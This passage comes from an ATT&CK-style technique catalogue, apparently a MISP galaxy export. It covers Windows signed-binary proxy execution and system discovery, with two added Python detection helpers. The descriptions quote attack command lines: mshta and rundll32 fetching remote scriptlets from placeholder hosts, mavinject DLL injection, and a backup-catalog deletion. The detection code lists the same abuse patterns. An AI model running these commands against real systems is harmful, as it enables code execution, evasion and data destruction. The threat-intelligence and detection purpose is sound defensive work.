A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. <sup>[[MsitPros CHM Aug 2017](https://app.tidalcyber.com/references/d4e4cc8a-3246-463f-ba06-d68459d907d4)]</sup> <sup>[[Microsoft CVE-2017-8625 Aug 2017](https://app.tidalcyber.com/references/402cb526-ef57-4d27-b96b-f98008abe716)]</sup>

The tag is: misp-galaxy:technique="Compiled HTML File"

Control Panel

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files; the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup><sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup> For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup> Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.<sup>[[Microsoft Implementing CPL](https://app.tidalcyber.com/references/63c5c654-e885-4427-a644-068f4057f35f)]</sup> <sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup><sup>[[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)]</sup>

Malicious Control Panel items can be delivered via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns<sup>[[TrendMicro CPL Malware Jan 2014](https://app.tidalcyber.com/references/9549f9b6-b771-4500-bd82-426c7abdfd8f)]</sup><sup>[[TrendMicro CPL Malware Dec 2013](https://app.tidalcyber.com/references/fd38f1fd-37e9-4173-b319-3f92c2743055)]</sup> or executed as part of multi-stage malware.<sup>[[Palo Alto Reaver Nov 2017](https://app.tidalcyber.com/references/69fbe527-2ec4-457b-81b1-2eda65eb8442)]</sup> Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through their <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup>

The tag is: misp-galaxy:technique="Control Panel"

InstallUtil

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. <sup>[[MSDN InstallUtil](https://app.tidalcyber.com/references/54d962fc-4ca6-4f5f-b383-ec87d711a764)]</sup> The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. <sup>[[LOLBAS Installutil](https://app.tidalcyber.com/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]</sup>

The tag is: misp-galaxy:technique="InstallUtil"

Mavinject

Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).<sup>[[LOLBAS Mavinject](https://app.tidalcyber.com/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]</sup>

Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5)), allowing for arbitrary code execution (ex. <code>C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).<sup>[[ATT Lazarus TTP Evolution](https://app.tidalcyber.com/references/594c59ff-c4cb-4164-a62d-120e282b2538)]</sup><sup>[[Reaqta Mavinject](https://app.tidalcyber.com/references/5c0e0c84-2992-4098-8913-66a20ca61bf4)]</sup> Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.

In addition to [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5), Mavinject.exe can also be abused to perform import descriptor injection via its <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.<sup>[[Mavinject Functionality Deconstructed](https://app.tidalcyber.com/references/17b055ba-5e59-4508-ba77-2519c03c6d65)]</sup>

The tag is: misp-galaxy:technique="Mavinject"

MMC

Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.<sup>[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)]</sup><sup>[[what_is_mmc](https://app.tidalcyber.com/references/57e130ab-f981-423e-bafe-51d0d0e1abdf)]</sup> MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft-created .msc files to manage system configuration.<sup>[[win_msc_files_overview](https://app.tidalcyber.com/references/81aa896a-3498-4c37-8882-2b77933b71a8)]</sup>

For example, <code>mmc C:\Users\foo\admintools.msc /a</code> will open a custom, saved console msc file in author mode.<sup>[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)]</sup> Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window.

Adversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).<sup>[[win_wbadmin_delete_catalog](https://app.tidalcyber.com/references/6adfba35-3bf1-4915-813e-40c4a843ae34)]</sup><sup>[[phobos_virustotal](https://app.tidalcyber.com/references/929dbb22-34a5-4377-95dd-9e240ecb343a)]</sup>

Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) class object.<sup>[[win_clsid_key](https://app.tidalcyber.com/references/239bb629-2733-4da3-87c2-47a7ab55433f)]</sup> Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.<sup>[[mmc_vulns](https://app.tidalcyber.com/references/7bcf1c90-6299-448b-92c3-a6702882936a)]</sup> Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\path\to\test.msc</code>.<sup>[[abusing_com_reg](https://app.tidalcyber.com/references/7f0f223f-09b1-4f8f-b6f1-1044e2ac7066)]</sup>

The tag is: misp-galaxy:technique="MMC"

Mshta

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. <sup>[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]</sup> <sup>[[Red Canary HTA Abuse Part Deux](https://app.tidalcyber.com/references/39b1cb2f-a07b-49f2-bf2c-15f0c9b95772)]</sup> <sup>[[FireEye Attacks Leveraging HTA](https://app.tidalcyber.com/references/1876a476-b2ff-4605-a78b-89443d21b063)]</sup> <sup>[[Airbus Security Kovter Analysis](https://app.tidalcyber.com/references/a8420828-9e00-45a1-90d7-a37f898204f9)]</sup> <sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup>

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. <sup>[[Wikipedia HTML Application](https://app.tidalcyber.com/references/f1f76055-91f8-4977-9392-bed347e4f181)]</sup> HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. <sup>[[MSDN HTML Applications](https://app.tidalcyber.com/references/2de103a8-8d72-40f9-b366-b908364dd090)]</sup>

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. <sup>[[LOLBAS Mshta](https://app.tidalcyber.com/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]</sup>

The tag is: misp-galaxy:technique="Mshta"

Msiexec

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).<sup>[[Microsoft msiexec](https://app.tidalcyber.com/references/028a8dc6-08f6-4660-8b82-9d5483d15f72)]</sup> The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.<sup>[[LOLBAS Msiexec](https://app.tidalcyber.com/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]</sup><sup>[[TrendMicro Msiexec Feb 2018](https://app.tidalcyber.com/references/768c99f3-ee28-47dc-bc33-06d50ac72dea)]</sup> Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.<sup>[[Microsoft AlwaysInstallElevated 2018](https://app.tidalcyber.com/references/19026f4c-ad65-435e-8c0e-a8ccc9895348)]</sup>

The tag is: misp-galaxy:technique="Msiexec"

Odbcconf

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.<sup>[[Microsoft odbcconf.exe](https://app.tidalcyber.com/references/9df74876-2abf-4ced-b986-36212225d795)]</sup> The Odbcconf.exe binary may be digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}</code>). <sup>[[LOLBAS Odbcconf](https://app.tidalcyber.com/references/febcaaec-b535-4347-a4c7-b3284b251897)]</sup><sup>[[TrendMicro Squiblydoo Aug 2017](https://app.tidalcyber.com/references/efeb475c-2a7c-4ab6-814d-3ee7866fa322)]</sup><sup>[[TrendMicro Cobalt Group Nov 2017](https://app.tidalcyber.com/references/81847e06-fea0-4d90-8a9e-5bc99a2bf3f0)]</sup>

The tag is: misp-galaxy:technique="Odbcconf"

Regsvcs/Regasm

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. <sup>[[MSDN Regsvcs](https://app.tidalcyber.com/references/4f3651df-159e-4006-8cb6-de0d0712a194)]</sup> <sup>[[MSDN Regasm](https://app.tidalcyber.com/references/66a3de54-4a16-4b1b-b18f-e3842aeb7b40)]</sup>

Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. <sup>[[LOLBAS Regsvcs](https://app.tidalcyber.com/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]</sup><sup>[[LOLBAS Regasm](https://app.tidalcyber.com/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]</sup>

The tag is: misp-galaxy:technique="Regsvcs/Regasm"

Regsvr32

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. <sup>[[Microsoft Regsvr32](https://app.tidalcyber.com/references/723ec577-5ea8-4ced-b6c3-b7aaabe1d7e8)]</sup>

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to a file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. <sup>[[LOLBAS Regsvr32](https://app.tidalcyber.com/references/8e32abef-534e-475a-baad-946b6ec681c1)]</sup> This variation of the technique is often referred to as "Squiblydoo" and has been used in campaigns targeting governments. <sup>[[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)]</sup> <sup>[[FireEye Regsvr32 Targeting Mongolian Gov](https://app.tidalcyber.com/references/d1509d15-04af-46bd-a6b1-30fbd179b257)]</sup>

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://app.tidalcyber.com/technique/3e1ef5ba-6426-4fe0-ad48-78557667d680). <sup>[[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)]</sup>

The tag is: misp-galaxy:technique="Regsvr32"

Rundll32

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, rather than executing the DLL directly (i.e. [Shared Modules](https://app.tidalcyber.com/technique/8941d1f4-d80c-4aaa-821a-a059c2a0f854)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://app.tidalcyber.com/technique/b5cc9ab3-6501-4c50-904e-1a25a4088125) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. <sup>[[Trend Micro CPL](https://app.tidalcyber.com/references/d90a33aa-8f20-49cb-aa27-771249cb65eb)]</sup>

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. <sup>[[This is Security Command Line Confusion](https://app.tidalcyber.com/references/49a21bba-b77d-4b0e-b666-20ef2826e92c)]</sup>

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.<sup>[[Attackify Rundll32.exe Obscurity](https://app.tidalcyber.com/references/daa35853-eb46-4ef4-b543-a2c5157f96bf)]</sup><sup>[[Github NoRunDll](https://app.tidalcyber.com/references/72d4b682-ed19-4e0f-aeff-faa52b3a0439)]</sup> DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.<sup>[[rundll32.exe defense evasion](https://app.tidalcyber.com/references/0f31f0ff-9ddb-4ea9-88d0-7b3b688764af)]</sup>
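The entry-point lookup order described above, as an added example (not code from the MISP galaxy or the ATT&CK source): a small review helper that parses a rundll32 command line, resolves the named entry point against a constructed export list in W, then A, then bare-name order, and flags the ordinal and `javascript:` forms. The DLL names, export tables and URLs are constructed for the demonstration.

```python
"""Review helper for rundll32.exe command lines.

Added example; not code from the MISP galaxy or the ATT&CK source.
Models the entry-point lookup order stated in the technique text
(name + "W", then name + "A", then the bare name), the ordinal form
(file.dll,#1) and the javascript: protocol-handler form.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed export tables, keyed by lower-cased DLL file name, in the shape a
# PE export-directory parser would return. "#N" models an ordinal-only export.
EXPORT_CATALOGUE: Dict[str, List[str]] = {
    "exampledll.dll": ["ExampleFunction", "ExampleFunctionA", "ExampleFunctionW"],
    "clean.dll": ["Run"],
    "file.dll": ["#1", "#2"],
}

_RUNDLL32 = re.compile(r'^\s*"?(?:[^"\s]*[\\/])?rundll32(?:\.exe)?"?\s+(.*)$',
                       re.IGNORECASE)


def lookup_order(entry: str) -> List[str]:
    """Names rundll32.exe tries for a requested entry point, in order."""
    return [entry + "W", entry + "A", entry]


def resolve_entry(exports: List[str], entry: str) -> Optional[str]:
    """Return the export rundll32.exe would actually call, or None."""
    if entry.startswith("#"):
        # Ordinal form: the export name plays no part in the lookup.
        return entry if entry in exports else None
    for candidate in lookup_order(entry):
        if candidate in exports:
            return candidate
    return None


def parse_rundll32(cmdline: str) -> Optional[Tuple[str, str, str]]:
    """Split 'rundll32.exe <dll>,<entry> [args]' into (dll, entry, args).

    Accepts a bare or fully qualified rundll32 image and a space after the
    comma; returns None for command lines that do not name a DLL,entry pair.
    """
    m = _RUNDLL32.match(cmdline)
    if not m or "," not in m.group(1):
        return None
    dll, after = m.group(1).split(",", 1)
    entry, _, args = after.strip().partition(" ")
    return dll.strip().strip('"'), entry, args.strip()


def review(cmdline: str, catalogue: Dict[str, List[str]] = EXPORT_CATALOGUE) -> dict:
    """Resolve the entry point named in a rundll32 command line and report the
    conditions from the technique text that deserve analyst attention."""
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return {"parsed": False, "resolved": None,
                "findings": ["not a rundll32 <dll>,<entry> command line"]}
    dll, entry, args = parsed
    findings: List[str] = []
    if dll.lower().startswith("javascript:"):
        # The "DLL" argument is a protocol handler, so a script, not a module, runs.
        findings.append("javascript: protocol handler passed as the DLL argument")
    exports = catalogue.get(re.split(r"[\\/]", dll)[-1].lower())
    resolved = None
    if exports is None:
        findings.append("no export table available for %s" % dll)
    else:
        resolved = resolve_entry(exports, entry)
        if entry.startswith("#"):
            findings.append("entry point given by ordinal; no function name to review")
        elif resolved is None:
            findings.append("no export matches %s" % entry)
        elif resolved != entry:
            # The bare name shown in the command line is not the code that runs.
            findings.append("%s resolves to %s (suffixed export shadows the bare name)"
                            % (entry, resolved))
    return {"parsed": True, "dll": dll, "entry": entry, "args": args,
            "resolved": resolved, "findings": findings}


if __name__ == "__main__":
    for line in (
        "rundll32.exe ExampleDLL.dll, ExampleFunction",
        r"C:\Windows\System32\rundll32.exe file.dll,#1",
        "rundll32.exe clean.dll,Run",
        r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();'
        r'GetObject("script:https://www.example.com/malicious.sct")',
    ):
        print(line, "->", review(line))
```

Real export tables should come from a PE parser rather than the constructed catalogue; many legitimate Windows DLLs export A/W pairs, so the shadowing finding is a review signal, not a verdict.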

The tag is: misp-galaxy:technique="Rundll32"

Verclsid

Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before it is used by Windows Explorer or the Windows Shell.<sup>[[WinOSBite verclsid.exe](https://app.tidalcyber.com/references/5d5fa25b-64a9-4fdb-87c5-1a69a7d2f874)]</sup>

Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.<sup>[[LOLBAS Verclsid](https://app.tidalcyber.com/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]</sup><sup>[[Red Canary Verclsid.exe](https://app.tidalcyber.com/references/f64e934f-737d-4461-8158-ae855bc472c4)]</sup><sup>[[BOHOPS Abusing the COM Registry](https://app.tidalcyber.com/references/3b5c0e62-7ac9-42e1-b2dd-8f2e0739b9d7)]</sup><sup>[[Nick Tyrer GitHub](https://app.tidalcyber.com/references/f4f89926-71eb-4130-a644-8240d2bab721)]</sup>

The tag is: misp-galaxy:technique="Verclsid"

System Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.<sup>[[split man page](https://app.tidalcyber.com/references/3a4dc770-8bfa-44e9-bb0e-f0af0ae92994)]</sup><sup>[[GTFO split](https://app.tidalcyber.com/references/4b86c8c3-57b0-4558-be21-f928acb23f49)]</sup>

The tag is: misp-galaxy:technique="System Binary Proxy Execution"
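Detection logic for the proxy-execution binaries covered in the sections above (CMSTP, Control Panel, Mavinject, MMC, Mshta, Msiexec, Odbcconf, Regsvr32 and Verclsid), as an added example that is not part of the original page: each rule pairs an image name with the command-line form quoted in that technique's description and is run over constructed Sysmon-style process-creation events, including benign administrative uses that must not fire. Hostnames, paths, the PID and the CLSID are placeholders.

```python
"""Process-creation detections for the proxy-execution binaries above.

Added example; not code from the MISP galaxy or the ATT&CK source.
Events are Sysmon-style dicts constructed for the demonstration; the
command-line forms mirror those quoted in each technique description.
"""
import re
from typing import Dict, List

# (rule name, image basename, command-line pattern, what a hit indicates)
RULES = [
    ("mshta_remote_or_inline", "mshta.exe",
     r"https?://|vbscript:|javascript:", "HTA or inline script from a URL/protocol handler"),
    ("regsvr32_remote_scriptlet", "regsvr32.exe",
     r"https?://|\.sct\b", "COM scriptlet by URL (Squiblydoo); nothing is registered"),
    ("cmstp_inf_user_path", "cmstp.exe",
     r"\\users\\[^\\]+\\[^\s]*\.inf\b", "INF profile supplied from a user-writable path"),
    ("control_cpl_user_path", "control.exe",
     r"\\users\\[^\\]+\\[^\s]*\.cpl\b", "CPL (renamed DLL) run from a user-writable path"),
    ("odbcconf_regsvr", "odbcconf.exe",
     r"\bregsvr\b", "REGSVR action used to load a DLL"),
    ("mavinject_injection", "mavinject.exe",
     r"/injectrunning\b|/hmodule=", "DLL or import-descriptor injection into a PID"),
    ("verclsid_clsid_exec", "verclsid.exe",
     r"/s\s+/c\s+\{[0-9a-f-]{36}\}", "COM object executed by CLSID"),
    ("mmc_embedding_msc", "mmc.exe",
     r"-embedding\s+\S+\.msc\b", "-Embedding with a custom .msc console"),
    ("msiexec_remote_package", "msiexec.exe",
     r"https?://", "MSI package fetched over HTTP"),
]
COMPILED = [(n, b, re.compile(p, re.IGNORECASE), w) for n, b, p, w in RULES]

# Constructed events. Hostnames, paths, the PID and the CLSID are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://webserver.example/payload.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta vbscript:Close(Execute("GetObject(""script:https://webserver.example/payload.sct"")"))'},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s https://webserver.example/file.sct"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /s C:\Users\Public\profile.inf"},
    {"Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r"control.exe C:\Users\Public\item.cpl"},
    {"Image": r"C:\Windows\System32\odbcconf.exe",
     "CommandLine": r'odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}'},
    {"Image": r"C:\Windows\System32\mavinject.exe",
     "CommandLine": r"mavinject.exe 4321 /INJECTRUNNING C:\Users\Public\file.dll"},
    {"Image": r"C:\Windows\System32\verclsid.exe",
     "CommandLine": "verclsid.exe /S /C {00000000-0000-0000-0000-000000000000}"},
    {"Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"mmc.exe -Embedding C:\path\to\test.msc"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /q /i http://webserver.example/pkg.msi"},
    # Benign administrative use of the same binaries; none of these should fire.
    {"Image": r"C:\Windows\System32\mmc.exe", "CommandLine": "mmc gpedit.msc"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\comp.dll"'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\setup.msi"},
]


def basename(path: str) -> str:
    """Lower-cased file name of an image path, accepting either separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) pair whose image and command line match."""
    findings = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        for name, binary, pattern, why in COMPILED:
            if image == binary and pattern.search(cmd):
                findings.append({"rule": name, "why": why, "CommandLine": cmd})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print("%-26s %s\n    %s" % (f["rule"], f["why"], f["CommandLine"]))
```

Matching on the image basename alone does not cover a renamed copy of the binary; pair these rules with OriginalFileName or signer fields where the telemetry provides them.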

System Information Discovery

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as [Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain the currently mounted disks and the free space on each. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather detailed system information (e.g. <code>show version</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup> [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.<sup>[[OSX.FairyTale](https://app.tidalcyber.com/references/27f8ad45-53d2-48ba-b549-f7674cf9c2e7)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Google Instances Resource](https://app.tidalcyber.com/references/9733447c-072f-4da8-9cc7-0a0ce6a3b820)]</sup><sup>[[Microsoft Virutal Machine API](https://app.tidalcyber.com/references/f565c237-07c5-4e9e-9879-513627517109)]</sup>

The tag is: misp-galaxy:technique="System Information Discovery"

System Language Discovery

Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.<sup>[[Malware System Language Check](https://app.tidalcyber.com/references/3d4c5366-038a-453e-b803-a172b95da5f7)]</sup>

